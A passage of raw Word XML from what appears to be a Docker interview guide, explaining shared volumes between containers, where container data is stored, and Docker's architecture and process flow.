          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mount the same volume</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into each container during creation. This allows all containers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read/write to the same storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62415AF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484F82">
          <v:rect id="_x0000_i3637" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="004BE93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eps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D8B0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1. Create a named volume:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BC5B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create shared-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADDA6B"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2. Run multiple containers using the same volume:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A1374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1 -v shared-data:/app/data busybox tail -f /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D1974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2 -v shared-data:/app/data busybox tail -f /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4358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oth container1 and container2 now share the same volume mounted at /app/data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6A6F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1F1973">
          <v:rect id="_x0000_i3638" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="555FC4D8"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Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F630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hanges</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> made by one container are </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visible</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275674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Useful for sharing </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lo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confi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uploads</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABC9F7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Ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent access</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is managed at the application level (especially for write-heavy operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA9A6C" w14:textId="399CD316"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639" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A820843" w14:textId="559D4AF8" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="006344A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="899" w:name="_Toc197868113"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where does an object get stored when created inside a docker container</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="899"/>
    </w:p>
    <w:p w14:paraId="0CE8B67D" w14:textId="7819430E"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hen an object (like a file or data) is created </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inside a Docker container</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is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 xml:space="preserve">, which is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Union File System</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD961A"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71922">
          <v:rect id="_x0000_i3640" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C64423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orage Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4DA2A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By default</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7665DCF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bjects (e.g., files, logs) are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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB236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is </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ephemeral</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—i.e., if the container is deleted, the data is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA3CC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volume is mounted</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B4D27"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f you're using a volume (-v volume-name:/path), the object is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volume on the host</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (typically under /var/lib/docker/volumes/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BB25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makes the data </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>persistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across container restarts/deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1335F0B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bind mount is used</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760D4B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ith a bind mount (-v /host/path:/container/path), the data is written </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>directly to the host filesystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CDD68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EBF37D">
          <v:rect id="_x0000_i3641" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB2B7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521"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="5BE16EEC" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B05AC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Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4896CA7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Where the object is stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="47ADAA3D" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7269491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No volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C25229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writable layer (ephemeral)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="2103550A" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C68D1C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used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C43D30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managed volume on the host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="314DF609" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E21B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ind mount used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5846DB0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file system (path you mounted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="476B29E1" w14:textId="254510B0"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642" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B455462" w14:textId="15582AB6" w:rsidR="00613601" w:rsidRPr="00CE4B95" w:rsidRDefault="00A504FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="900" w:name="_Toc197868114"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the process of Docker</w:t>
      </w:r>
      <w:r w:rsidR="00613601" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="900"/>
    </w:p>
    <w:p w14:paraId="5688C4F5" w14:textId="5C4DD00D"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Docker process</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to how Docker works internally to build, run, and manage containers. Here's a simplified breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker lifecycle and architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8C1C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47378">
          <v:rect id="_x0000_i3643" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E8971"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788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="40DD6CFD" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5B9CF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ponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA0FB8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57E0997B" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09AAF9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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3964E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LI tool (docker) that users interact with. Sends commands to the Docker daemon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="10A08E56" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E6CD9E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w:t>
            </w:r>
            <w:r w:rsidRPr="00127EBD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (dockerd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F1359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s in the background and handles building, running, and managing Docker containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="3EBAE6A0" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A81357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Images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EDB1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ad-only templates used to create containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="5AE25F9A" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232E62C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ontainers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4590B0F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nable instances of Docker images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="6884EAA4" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="397A8FA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Registries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DE5EB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positories like Docker Hub to store and share images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E2A8B11"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4E8BE0">
          <v:rect id="_x0000_i3644" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125DDD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Docker Process Flow (Step-by-Step)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BBA8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User Issues a Docker Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3D9B8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g., docker run nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C83C13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 Sends Command to Docker Daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25981F8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CLI (docker) talks to the Docker daemon (dockerd) using REST API over Unix socket or TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FED2B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 Checks Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E596CE"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the image is not available locally, it pulls it from Docker Hub (or other registry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D75A1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Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8FF5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unpacks the image layers and creates a container (with its own file system and isolated environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958D9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Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AFA4E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application (e.g., nginx) runs inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D557A7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Networking and Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43483DE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ets up virtual networking and attaches volumes or bind mounts if specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457BF83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Monitoring and Lifecycle Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FED8D3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tracks the container lifecycle (start, stop, pause, restart) and logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FB59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sources (CPU, memory) can be limited per container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F68C0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58DC93">
          <v:rect id="_x0000_i3645" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="786662B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909"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="53286474" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE5406D"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mand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E54F85"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10D3F5F2" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FA286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build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="290A72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a Docker image from a Dockerfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="5D10205A" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
